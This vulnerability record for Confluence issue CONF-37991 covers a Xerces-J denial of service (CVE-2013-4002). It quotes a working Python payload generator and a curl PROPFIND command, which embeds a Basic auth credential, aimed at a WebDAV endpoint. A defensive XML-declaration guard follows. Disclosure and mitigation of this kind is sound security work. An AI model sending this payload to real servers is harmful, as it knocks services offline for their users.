ATLASSIAN:CONF-37991 (atlassian, reported by aminozhenko)
History: Jun 19, 2015 - 6:43 a.m.

Denial of Service attack through vulnerable Xerces-J library

Date: 2015-06-19 06:43:36
Author: aminozhenko
Source: jira.atlassian.com

7.1 High (CVSS2)

Access Vector:          NETWORK
Access Complexity:      MEDIUM
Authentication:         NONE
Confidentiality Impact: NONE
Integrity Impact:       NONE
Availability Impact:    COMPLETE

Vector: AV:N/AC:M/Au:N/C:N/I:N/A:C

EPSS: 0.019 Low
EPSS Percentile: 87.0%

{quote}
There is a WebDAV endpoint that is accessible via the following URL:
https://pwnie.ninja/confluence/plugins/servlet/confluence/default . It is possible to pass XML as the data for a
PROPFIND request.
The following Python code will generate XML with a long pseudo-attribute name that exploits the CVE-2013-4002
issue.
{code}
#!/usr/bin/env python
# Python 2 script (raw_input, print statement)
import os

outdir = raw_input('specify output directory > ')

# XML to exploit CVE-2013-4002
xml = "<?xml " + "\xe7\x9a\x84" * 1000000 + "='china' version = '1.0'?><a />"
with open(os.path.join(outdir, 'cve2013-4002.xml'), 'w') as out:
    out.write(xml)

def sizeof(num, suffix='B'):
    for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']:
        if abs(num) < 1024.0:
            return "%3.1f%s%s" % (num, unit, suffix)
        num /= 1024.0
    return "%.1f%s%s" % (num, 'Yi', suffix)

print "[+] File 'cve2013-4002.xml':", sizeof(len(xml))
{code}
According to the XML specification there are only three valid pseudo-attributes: version, encoding and
standalone. When we submit any random pseudo-attribute with a long name, the secure version of the Xerces-J
parser just ignores it. At the same time, the vulnerable version will try to parse it. This will require much CPU
work.
If you try to send this request with curl, you will see that there is no immediate answer from the server. You
will get a "Gateway Time-out" answer from the server after 4 minutes.
{code}
curl -X 'PROPFIND' -H 'Depth: 0' -H 'Content-Type: application/xml' \
  -H 'Authorization: Basic Z3IzM2t3YXJpb3I6c2ExODEyODM5MSE=' --data-binary \
  '@/tmp/cve2013-4002.xml' \
  https://pwnie.ninja/confluence/plugins/servlet/confluence/default
{code}
{quote}
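The report's explanation (only version, encoding and standalone are legal pseudo-attributes in the XML declaration) points at a cheap front-end mitigation: reject a body with an oversized or unexpected declaration before it ever reaches Xerces-J. The following Python 3 guard is an added example, not code from the report or from Confluence; the 256-byte limit, the function name and the sample bodies are assumptions.

```python
#!/usr/bin/env python3
"""Pre-parse guard for the XML declaration (added example, not from the report).

The XML spec allows exactly three pseudo-attributes in <?xml ...?>: version,
encoding and standalone, in that order. CVE-2013-4002 is triggered by an extra
pseudo-attribute with an enormous name, so a front end can reject such a body
before it reaches Xerces-J, doing only a bounded amount of work itself.
"""
import re

ALLOWED_PSEUDO_ATTRS = ("version", "encoding", "standalone")
# Assumed limit: a legitimate declaration is a few dozen bytes at most.
MAX_DECL_LEN = 256

# The XMLDecl production from the XML 1.0 spec, with value syntax simplified.
_XMLDECL = re.compile(
    r'\s+version\s*=\s*(["\'])1\.[0-9]+\1'
    r'(\s+encoding\s*=\s*(["\'])[A-Za-z][A-Za-z0-9._-]*\3)?'
    r'(\s+standalone\s*=\s*(["\'])(yes|no)\5)?\s*'
)
# Loose scan used only to name the offending pseudo-attribute in the reason.
_PSEUDO_ATTR_NAME = re.compile(r'([^\s=]+)\s*=')


def check_xml_declaration(data, max_decl_len=MAX_DECL_LEN):
    """Return (ok, reason) for a raw request body given as bytes."""
    body = data[3:] if data.startswith(b"\xef\xbb\xbf") else data  # UTF-8 BOM
    if not body.startswith(b"<?xml"):
        return True, "no XML declaration"
    # Only search a bounded window so the guard itself cannot be made slow.
    end = body.find(b"?>", 0, max_decl_len + 2)
    if end < 0:
        return False, "XML declaration longer than %d bytes" % max_decl_len
    decl = body[5:end].decode("utf-8", "replace")
    if _XMLDECL.fullmatch(decl):
        return True, "ok"
    for name in _PSEUDO_ATTR_NAME.findall(decl):
        if name not in ALLOWED_PSEUDO_ATTRS:
            return False, "unexpected pseudo-attribute %r" % name[:32]
    return False, "malformed XML declaration"


if __name__ == "__main__":
    # Constructed samples: a normal body and a body with a bogus pseudo-attribute.
    for sample in (b'<?xml version="1.0" encoding="UTF-8"?><a/>',
                   b"<?xml foo='bar' version='1.0'?><a/>"):
        print(sample[:40], check_xml_declaration(sample))
```

The guard is deliberately strict: a declaration with the legal pseudo-attributes in the wrong order is also rejected, because a conforming producer never emits one.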

CPE
Name        Operator   Version
confluence  le         5.7.4
confluence  lt         5.8.9
